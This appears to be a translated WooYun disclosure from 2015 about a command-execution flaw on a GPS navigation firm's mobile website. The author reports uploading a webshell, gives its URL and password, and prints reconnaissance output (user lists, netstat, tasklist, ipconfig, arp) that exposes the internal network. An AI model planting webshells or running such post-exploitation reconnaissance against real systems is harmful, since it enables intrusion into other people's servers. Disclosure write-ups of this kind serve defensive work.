
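Vulnerability summary

Bug ID: wooyun-2015-0161781

Vulnerability title: getshell on the official website server of 深圳市赛格导航科技股份有限公司

Affected vendor: 深圳市赛格导航科技股份有限公司

Vulnerability author: 朱元璋

Submitted: 2015-12-16 13:58

Fixed: 2016-01-28 17:10

Disclosed: 2016-01-28 17:10

Vulnerability type: system/service patches not applied in time

Severity: High

Self-assessed Rank: 15

Vulnerability status: vendor could not be contacted, or vendor actively ignored the report

Vulnerability source: http://www.wooyun.org; for questions or help, contact [email protected]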



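Vulnerability details

Disclosure status:

2015-12-16: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2016-01-28: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Relying on nothing but a navigation software product, they bring in several hundred million yuan a year. A nobody like me could cry! Knowledge is money. …

Detailed description: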

0.jpg


Open the official website http://www.chinagps.cc/ and click the link marked in the figure

00.png


The address http://m.chinagps.cc:9999/driverBook/myCar.action has a command execution vulnerability

000.png


Uploaded a trojan directly to the server

1.jpg


http://m.chinagps.cc:9999/driverBook/test.jsp, password tom

Proof of vulnerability:

 
[*] 磁盘列表 [ C:D:E:F:G: ]
E:\车圣宝典服务\webapps\driverBook\driverBook\> net user
\\SEGCSBD 的用户帐户
-------------------------------------------------------------------------------
1 Administrator Guest
SUPPORT_388945a0 webapp
命令成功完成。
系统找不到指定的路径。
E:\车圣宝典服务\bin\> net share
共享名 资源 注释
-------------------------------------------------------------------------------
IPC$ 远程 IPC
命令成功完成。
系统找不到指定的路径。
E:\车圣宝典服务\bin\> net view
服务器名称 注释
-------------------------------------------------------------------------------
\\CENTER-7EB6A930
\\CENTER-PC15
\\DELL-0D215E6ACA
\\DELL-33113689DF
\\DELL-A8101378DC
\\DELL-BH111
\\DELL-BH12
\\DELL-DCE65DCEBC
\\DELL-PC
\\DELL-TJ
\\FEEL
\\GIS97
\\HAIMA2
\\HAIMA3
\\JKZX-CAD7E5C75D
\\NATION
\\PC201409170355
\\SAIGE-PC
\\SEAT143
\\SEAT152
\\SEAT191
\\SEATX
\\SEG-DAA9625F816
\\SEGCSBD
\\SEGVPN
\\SZCOMCENTER
\\USER-1FOUF4V0OW
\\WIN-52TUTTR7H26
\\WIN-UGVBU2D0JBF
\\WWW-BEA87E1356D
\\WWW-DDB5978681F
命令成功完成。
系统找不到指定的路径。
E:\车圣宝典服务\bin\> net start
已经启动以下 Windows 服务:
Apache2.2
COM+ Event System
Cryptographic Services
DbProtectSupport
DCOM Server Process Launcher
DHCP Client
DNS Client
Event Log
HID Input Service
Logical Disk Manager
Mnopqr Tuvwxyab Defghijk Mnop
Network Connections
Network Location Awareness (NLA)
Plug and Play
Protected Storage
Pxrtok fqtbtjepvrsxajzvzy
Remote Access Connection Manager
Remote Procedure Call (RPC)
Security Accounts Manager
Server
Shell Hardware Detection
System Event Notification
Task Scheduler
Telephony
Terminal Services
VNC Server Version 4
Windows Audio
Windows Hels System
Windows Management Instrumentation
Windows Test My Test Server 1.0
Windows Time
Workstation
主动防御
命令成功完成。
系统找不到指定的路径。
E:\车圣宝典服务\bin\> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:13 0.0.0.0:0 LISTENING 548
TCP 0.0.0.0:37 0.0.0.0:0 LISTENING 548
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 1072
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 728
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 492
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 1160
TCP 0.0.0.0:5074 0.0.0.0:0 LISTENING 1248
TCP 0.0.0.0:5174 0.0.0.0:0 LISTENING 1248
TCP 0.0.0.0:7009 0.0.0.0:0 LISTENING 3040
TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING 3164
TCP 0.0.0.0:8081 0.0.0.0:0 LISTENING 2436
TCP 0.0.0.0:8086 0.0.0.0:0 LISTENING 3100
TCP 0.0.0.0:8087 0.0.0.0:0 LISTENING 3164
TCP 0.0.0.0:8088 0.0.0.0:0 LISTENING 3040
TCP 0.0.0.0:8099 0.0.0.0:0 LISTENING 2752
TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 2944
TCP 0.0.0.0:9993 0.0.0.0:0 LISTENING 2300
TCP 0.0.0.0:9999 0.0.0.0:0 LISTENING 2752
TCP 0.0.0.0:11211 0.0.0.0:0 LISTENING 2600
TCP 0.0.0.0:18099 0.0.0.0:0 LISTENING 2944
TCP 91.0.0.174:139 0.0.0.0:0 LISTENING 4
TCP 91.0.0.174:1208 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:1230 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:1253 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:1313 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:1480 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:2667 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:2693 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:2710 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:2737 91.235.140.194:43594 ESTABLISHED 2752
TCP 91.0.0.174:3670 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:3682 91.235.140.194:443 ESTABLISHED 2752
TCP 91.0.0.174:3683 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:3686 91.235.140.194:43594 ESTABLISHED 2752
TCP 91.0.0.174:3955 202.105.21.213:20742 ESTABLISHED 6028
TCP 91.0.0.174:4056 173.254.203.123:8080 CLOSE_WAIT 2720
TCP 91.0.0.174:4324 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:4351 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:4374 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:4397 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:4575 101.199.97.154:80 ESTABLISHED 348
TCP 91.0.0.174:4612 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:4625 202.105.21.213:20742 ESTABLISHED 5288
TCP 91.0.0.174:4638 111.206.79.140:80 ESTABLISHED 348
TCP 91.0.0.174:4639 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:4643 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:4671 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:4693 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:4867 173.254.203.123:8091 ESTABLISHED 4664
TCP 91.0.0.174:4927 14.215.177.49:80 TIME_WAIT 0
TCP 91.0.0.174:4946 14.18.245.221:80 CLOSE_WAIT 4416
TCP 91.0.0.174:4947 183.61.46.177:80 ESTABLISHED 4416
TCP 91.0.0.174:4968 68.71.143.140:7777 ESTABLISHED 2752
TCP 91.0.0.174:8088 113.106.90.236:44544 TIME_WAIT 0
TCP 91.0.0.174:8088 113.106.90.236:44732 TIME_WAIT 0
TCP 91.0.0.174:8088 113.106.90.236:44986 TIME_WAIT 0
TCP 91.0.0.174:9999 59.37.143.55:10689 FIN_WAIT_1 2752
TCP 91.0.0.174:9999 110.84.217.153:64485 TIME_WAIT 0
TCP 91.0.0.174:9999 117.136.75.167:41161 FIN_WAIT_2 2752
TCP 91.0.0.174:9999 122.228.20.120:43032 FIN_WAIT_1 2752
TCP 91.0.0.174:9999 171.111.45.41:32419 ESTABLISHED 2752
TCP 127.0.0.1:1034 127.0.0.1:1035 ESTABLISHED 2300
TCP 127.0.0.1:1035 127.0.0.1:1034 ESTABLISHED 2300
TCP 127.0.0.1:1036 127.0.0.1:1037 ESTABLISHED 2300
TCP 127.0.0.1:1037 127.0.0.1:1036 ESTABLISHED 2300
TCP 127.0.0.1:1038 127.0.0.1:1039 ESTABLISHED 2300
TCP 127.0.0.1:1039 127.0.0.1:1038 ESTABLISHED 2300
TCP 127.0.0.1:1040 127.0.0.1:1041 ESTABLISHED 2300
TCP 127.0.0.1:1041 127.0.0.1:1040 ESTABLISHED 2300
TCP 127.0.0.1:1042 127.0.0.1:1043 ESTABLISHED 2436
TCP 127.0.0.1:1043 127.0.0.1:1042 ESTABLISHED 2436
TCP 127.0.0.1:1044 127.0.0.1:1045 ESTABLISHED 2436
TCP 127.0.0.1:1045 127.0.0.1:1044 ESTABLISHED 2436
TCP 127.0.0.1:1046 127.0.0.1:1047 ESTABLISHED 2436
TCP 127.0.0.1:1047 127.0.0.1:1046 ESTABLISHED 2436
TCP 127.0.0.1:1048 127.0.0.1:1049 ESTABLISHED 2436
TCP 127.0.0.1:1049 127.0.0.1:1048 ESTABLISHED 2436
TCP 127.0.0.1:1057 127.0.0.1:1058 ESTABLISHED 3100
TCP 127.0.0.1:1058 127.0.0.1:1057 ESTABLISHED 3100
TCP 127.0.0.1:1059 127.0.0.1:1060 ESTABLISHED 3100
TCP 127.0.0.1:1060 127.0.0.1:1059 ESTABLISHED 3100
TCP 127.0.0.1:1065 127.0.0.1:1066 ESTABLISHED 2944
TCP 127.0.0.1:1066 127.0.0.1:1065 ESTABLISHED 2944
TCP 127.0.0.1:1067 127.0.0.1:1068 ESTABLISHED 2944
TCP 127.0.0.1:1068 127.0.0.1:1067 ESTABLISHED 2944
TCP 127.0.0.1:1069 127.0.0.1:1070 ESTABLISHED 2944
TCP 127.0.0.1:1070 127.0.0.1:1069 ESTABLISHED 2944
TCP 127.0.0.1:1071 127.0.0.1:1072 ESTABLISHED 2944
TCP 127.0.0.1:1072 127.0.0.1:1071 ESTABLISHED 2944
TCP 127.0.0.1:1073 127.0.0.1:11211 ESTABLISHED 2944
TCP 127.0.0.1:1086 127.0.0.1:1087 ESTABLISHED 2752
TCP 127.0.0.1:1087 127.0.0.1:1086 ESTABLISHED 2752
TCP 127.0.0.1:1088 127.0.0.1:1089 ESTABLISHED 2752
TCP 127.0.0.1:1089 127.0.0.1:1088 ESTABLISHED 2752
TCP 127.0.0.1:1090 127.0.0.1:1091 ESTABLISHED 2752
TCP 127.0.0.1:1091 127.0.0.1:1090 ESTABLISHED 2752
TCP 127.0.0.1:1092 127.0.0.1:1093 ESTABLISHED 2752
TCP 127.0.0.1:1093 127.0.0.1:1092 ESTABLISHED 2752
TCP 127.0.0.1:1094 127.0.0.1:11211 ESTABLISHED 2752
TCP 127.0.0.1:1107 127.0.0.1:1108 ESTABLISHED 2752
TCP 127.0.0.1:1108 127.0.0.1:1107 ESTABLISHED 2752
TCP 127.0.0.1:1109 127.0.0.1:1110 ESTABLISHED 2752
TCP 127.0.0.1:1110 127.0.0.1:1109 ESTABLISHED 2752
TCP 127.0.0.1:1761 127.0.0.1:1762 ESTABLISHED 2944
TCP 127.0.0.1:1762 127.0.0.1:1761 ESTABLISHED 2944
TCP 127.0.0.1:1763 127.0.0.1:1764 ESTABLISHED 2944
TCP 127.0.0.1:1764 127.0.0.1:1763 ESTABLISHED 2944
TCP 127.0.0.1:7005 0.0.0.0:0 LISTENING 3040
TCP 127.0.0.1:8005 0.0.0.0:0 LISTENING 3100
TCP 127.0.0.1:8006 0.0.0.0:0 LISTENING 3164
TCP 127.0.0.1:8025 0.0.0.0:0 LISTENING 2944
TCP 127.0.0.1:11211 127.0.0.1:1073 ESTABLISHED 2600
TCP 127.0.0.1:11211 127.0.0.1:1094 ESTABLISHED 2600
TCP 127.0.0.1:18025 0.0.0.0:0 LISTENING 2752
TCP 192.110.1.174:139 0.0.0.0:0 LISTENING 4
TCP 192.110.1.174:1056 192.110.1.175:3306 ESTABLISHED 2436
TCP 192.110.1.174:1063 192.110.1.178:61616 ESTABLISHED 2944
TCP 192.110.1.174:1085 192.110.1.178:61616 ESTABLISHED 2752
TCP 192.110.1.174:1122 192.110.1.175:3306 ESTABLISHED 3040
TCP 192.110.1.174:1123 192.110.1.175:3306 ESTABLISHED 3040
TCP 192.110.1.174:1124 192.110.1.175:3306 ESTABLISHED 3040
TCP 192.110.1.174:1125 192.110.1.175:3306 ESTABLISHED 3040
TCP 192.110.1.174:1126 192.110.1.175:3306 ESTABLISHED 3040
TCP 192.110.1.174:1127 192.110.1.175:3306 ESTABLISHED 3040
TCP 192.110.1.174:1128 192.110.1.175:3306 ESTABLISHED 3040
TCP 192.110.1.174:1129 192.110.1.175:3306 ESTABLISHED 3040
TCP 192.110.1.174:1130 192.110.1.175:3306 ESTABLISHED 3040
TCP 192.110.1.174:1131 192.110.1.175:3306 ESTABLISHED 3040
TCP 192.110.1.174:1174 192.110.1.175:3306 ESTABLISHED 3100
TCP 192.110.1.174:1525 192.110.1.175:3306 ESTABLISHED 2436
TCP 192.110.1.174:2702 192.110.1.175:3306 ESTABLISHED 3164
TCP 192.110.1.174:2703 192.110.1.175:3306 ESTABLISHED 3164
TCP 192.110.1.174:2704 192.110.1.175:3306 ESTABLISHED 3164
TCP 192.110.1.174:2705 192.110.1.175:3306 ESTABLISHED 3164
TCP 192.110.1.174:2706 192.110.1.175:3306 ESTABLISHED 3164
TCP 192.110.1.174:2958 192.110.1.175:3306 ESTABLISHED 2752
TCP 192.110.1.174:2959 192.110.1.175:3306 ESTABLISHED 2752
TCP 192.110.1.174:2976 192.110.1.175:3306 ESTABLISHED 2752
TCP 192.110.1.174:2977 192.110.1.175:3306 ESTABLISHED 2752
TCP 192.110.1.174:2978 192.110.1.175:3306 ESTABLISHED 2752
TCP 192.110.1.174:2979 192.110.1.175:3306 ESTABLISHED 2752
TCP 192.110.1.174:2980 192.110.1.175:3306 ESTABLISHED 2752
TCP 192.110.1.174:2981 192.110.1.175:3306 ESTABLISHED 2752
TCP 192.110.1.174:3057 192.110.1.175:3306 ESTABLISHED 2944
TCP 192.110.1.174:3058 192.110.1.175:3306 ESTABLISHED 2944
TCP 192.110.1.174:3061 192.110.1.175:3306 ESTABLISHED 2752
TCP 192.110.1.174:3062 192.110.1.175:3306 ESTABLISHED 2752
TCP 192.110.1.174:3141 192.110.1.175:3306 ESTABLISHED 2944
TCP 192.110.1.174:4298 192.110.1.175:3306 ESTABLISHED 2944
TCP 192.110.1.174:4343 192.110.1.175:3306 ESTABLISHED 2944
TCP 192.110.1.174:4362 192.110.1.175:3306 ESTABLISHED 2944
TCP 192.110.1.174:4445 192.110.1.175:3306 ESTABLISHED 2944
TCP 192.110.1.174:4562 192.110.1.3:37 CLOSE_WAIT 548
TCP 192.110.1.174:4568 192.110.1.175:3306 ESTABLISHED 2944
TCP 192.110.1.174:4620 192.110.1.175:3306 ESTABLISHED 2944
TCP 192.110.1.174:4665 192.110.1.175:3306 ESTABLISHED 2944
TCP 192.110.1.174:4691 192.110.1.175:3306 ESTABLISHED 2300
TCP 192.110.1.174:4695 192.110.1.175:3306 ESTABLISHED 3100
TCP 192.110.1.174:4699 192.110.1.175:3306 ESTABLISHED 3100
TCP 192.110.1.174:4722 192.110.1.175:3306 ESTABLISHED 3100
TCP 192.110.1.174:4938 192.110.1.135:139 TIME_WAIT 0
TCP 192.110.1.174:4969 192.110.1.175:3306 ESTABLISHED 3100
TCP 192.110.1.174:8081 192.110.10.218:42286 ESTABLISHED 2436
TCP 192.110.1.174:8081 192.110.10.218:44391 ESTABLISHED 2436
TCP 192.110.1.174:8081 192.110.10.219:33398 ESTABLISHED 2436
TCP 192.110.1.174:8081 192.110.10.219:34017 ESTABLISHED 2436
UDP 0.0.0.0:37 *:* 548
UDP 0.0.0.0:123 *:* 548
UDP 0.0.0.0:1031 *:* 348
UDP 0.0.0.0:1138 *:* 2608
UDP 0.0.0.0:1150 *:* 2608
UDP 0.0.0.0:1945 *:* 2608
UDP 0.0.0.0:1946 *:* 2608
UDP 0.0.0.0:2913 *:* 2720
UDP 0.0.0.0:2933 *:* 2608
UDP 0.0.0.0:2935 *:* 2608
UDP 0.0.0.0:2952 *:* 2608
UDP 0.0.0.0:2953 *:* 2608
UDP 0.0.0.0:2957 *:* 2608
UDP 0.0.0.0:2958 *:* 2608
UDP 0.0.0.0:3600 *:* 348
UDP 0.0.0.0:4132 *:* 4664
UDP 0.0.0.0:4133 *:* 4664
UDP 0.0.0.0:4134 *:* 4664
UDP 0.0.0.0:4135 *:* 4664
UDP 0.0.0.0:4136 *:* 4664
UDP 0.0.0.0:4137 *:* 4664
UDP 0.0.0.0:4138 *:* 4664
UDP 0.0.0.0:4139 *:* 4664
UDP 0.0.0.0:4140 *:* 4664
UDP 0.0.0.0:4141 *:* 4664
UDP 0.0.0.0:4966 *:* 2608
UDP 91.0.0.174:123 *:* 1216
UDP 91.0.0.174:137 *:* 4
UDP 91.0.0.174:138 *:* 4
UDP 127.0.0.1:123 *:* 1216
UDP 127.0.0.1:1393 *:* 348
UDP 127.0.0.1:2916 *:* 2720
UDP 127.0.0.1:2920 *:* 4416
UDP 192.110.1.174:123 *:* 1216
UDP 192.110.1.174:137 *:* 4
UDP 192.110.1.174:138 *:* 4
系统找不到指定的路径。
E:\车圣宝典服务\bin\> tasklist /svc
映像名称 PID 服务
========================= ======== ============================================
System Idle Process 0 暂缺
System 4 暂缺
smss.exe 360 暂缺
csrss.exe 408 暂缺
winlogon.exe 432 暂缺
services.exe 480 Eventlog, PlugPlay
lsass.exe 492 ProtectedStorage, SamSs
svchost.exe 668 DcomLaunch
svchost.exe 728 RpcSs
svchost.exe 808 Dhcp, Dnscache
ZhuDongFangYu.exe 824 ZhuDongFangYu
svchost.exe 904 AudioSrv, CryptSvc, dmserver, EventSystem,
HidServ, lanmanserver, lanmanworkstation,
Netman, Nla, RasMan, Schedule, SENS,
ShellHWDetection, winmgmt
httpd.exe 1072 Apache2.2
svchost.exe 1160 TermService
svchost.exe 1216 W32Time
svchost.exe 1232 WinHelpss
winvnc4.exe 1248 WinVNC4
httpd.exe 1404 暂缺
explorer.exe 1936 暂缺
RTDCPL.EXE 184 暂缺
360tray.exe 348 暂缺
ctfmon.exe 380 暂缺
360sd.exe 384 暂缺
ApacheMonitor.exe 132 暂缺
AboutTime.exe 548 暂缺
svchost.exe 1176 TapiSrv
wmiprvse.exe 1932 暂缺
cmd.exe 2284 暂缺
java.exe 2300 暂缺
conime.exe 2304 暂缺
cmd.exe 2428 暂缺
java.exe 2436 暂缺
memcached.exe 2600 暂缺
360rp.exe 2608 暂缺
java.exe 2752 暂缺
java.exe 2944 暂缺
java.exe 3040 暂缺
java.exe 3100 暂缺
java.exe 3164 暂缺
iexplore.exe 2720 暂缺
cmd.exe 6124 暂缺
love.exe 4416 暂缺
Vswzuav.exe 6028 Wsrtoj ugjqsyuf
vmware-vmx.exe 4664 Windows Test My Test 1.0
hl.exe 4872 暂缺
svchost.exe 5288 Mnopqr Tuvwxyab Def
svchost.exe 18560 DbProtectSupport
cmd.exe 18840 暂缺
tasklist.exe 19512 暂缺
wmiprvse.exe 17656 暂缺
系统找不到指定的路径。
E:\车圣宝典服务\bin\> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : segcsbd
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 192.174:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Broadcom NetLink (TM) Gigabit Ethernet #2
Physical Address. . . . . . . . . : 00-25-64-C8-56-49
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.110.1.174
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . :
Ethernet adapter 91.174:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Realtek RTL8139 Family PCI Fast Ethernet NIC
Physical Address. . . . . . . . . : D8-5D-4C-6F-19-64
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 91.0.0.174
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 91.0.0.2
DNS Servers . . . . . . . . . . . : 202.96.128.68
202.96.134.133
系统找不到指定的路径。
E:\车圣宝典服务\bin\> systeminfo
主机名: SEGCSBD
OS 名称: Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS 版本: 5.2.3790 Service Pack 2 Build 3790
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: segbbs
注册的组织:
产品 ID: 69713-640-2197216-45203
初始安装日期: 2013-8-2, 13:44:14
系统启动时间: 8 天 15 小时 20 分 26 秒
系统制造商: Dell Inc.
系统型号: OptiPlex 380
系统类型: X86-based PC
处理器: 安装了 2 个处理器。
[01]: x86 Family 6 Model 23 Stepping 10 GenuineIntel ~2593 Mhz
[02]: x86 Family 6 Model 23 Stepping 10 GenuineIntel ~2593 Mhz
BIOS 版本: DELL - 15
Windows 目录: C:\WINDOWS
系统目录: C:\WINDOWS\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 2,012 MB
可用的物理内存: 680 MB
页面文件: 最大值: 3,910 MB
页面文件: 可用: 2,480 MB
页面文件: 使用中: 1,430 MB
页面文件位置: C:\pagefile.sys
域: WORKGROUP
登录服务器: \\SEGCSBD
修补程序: 安装了 484 个修补程序。
网卡: 安装了 2 个 NIC。
[01]: Broadcom NetLink (TM) Gigabit Ethernet
连接名: 192.174
启用 DHCP: 否
IP 地址
[01]: 192.110.1.174
[02]: Realtek RTL8139 Family PCI Fast Ethernet NIC
连接名: 91.174
启用 DHCP: 否
IP 地址
[01]: 91.0.0.174
系统找不到指定的路径。
E:\车圣宝典服务\bin\> net config
控制下列正在运行的服务:
Server
Workstation
命令成功完成。
系统找不到指定的路径。
E:\车圣宝典服务\bin\> arp -a
Interface: 192.110.1.174 --- 0x2
Internet Address Physical Address Type
192.110.1.95 c8-d3-a3-01-12-51 dynamic
192.110.1.109 00-19-bb-41-c0-f8 dynamic
192.110.1.134 bc-30-5b-a4-b8-ef dynamic
192.110.1.135 00-19-bb-41-c0-d9 dynamic
192.110.1.154 d4-be-d9-bd-f8-85 dynamic
192.110.1.175 bc-30-5b-cd-36-ac dynamic
192.110.1.178 00-15-5d-00-de-27 dynamic
192.110.1.182 00-1d-09-07-7c-00 dynamic
192.110.1.192 00-14-22-19-e7-b2 dynamic
192.110.8.194 84-8f-69-df-4f-1b dynamic
192.110.10.218 c8-1f-66-f3-ee-e4 dynamic
192.110.10.219 c8-1f-66-f5-59-71 dynamic
Interface: 91.0.0.174 --- 0x10004
Internet Address Physical Address Type
90.0.6.196 a4-1f-72-90-d8-31 dynamic
91.0.0.2 00-19-e0-ce-28-de dynamic
91.0.0.13 00-1d-09-1a-f2-cb dynamic
91.0.0.45 00-15-c5-ec-fe-7f dynamic
91.0.0.68 a4-1f-72-91-f5-67 dynamic
91.0.0.73 00-13-72-52-84-13 dynamic
91.0.0.96 00-22-19-56-82-bf dynamic
91.0.0.97 00-22-19-56-83-96 dynamic
91.0.0.180 a4-1f-72-90-d9-f7 dynamic
91.0.0.192 00-14-22-19-e7-b3 dynamic
91.0.7.163 ce-10-34-a8-97-66 dynamic
系统找不到指定的路径。
E:\车圣宝典服务\bin\>   

Remediation:

Strengthen security awareness

Copyright notice: when reposting, please credit the source 朱元璋@乌云


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively refused

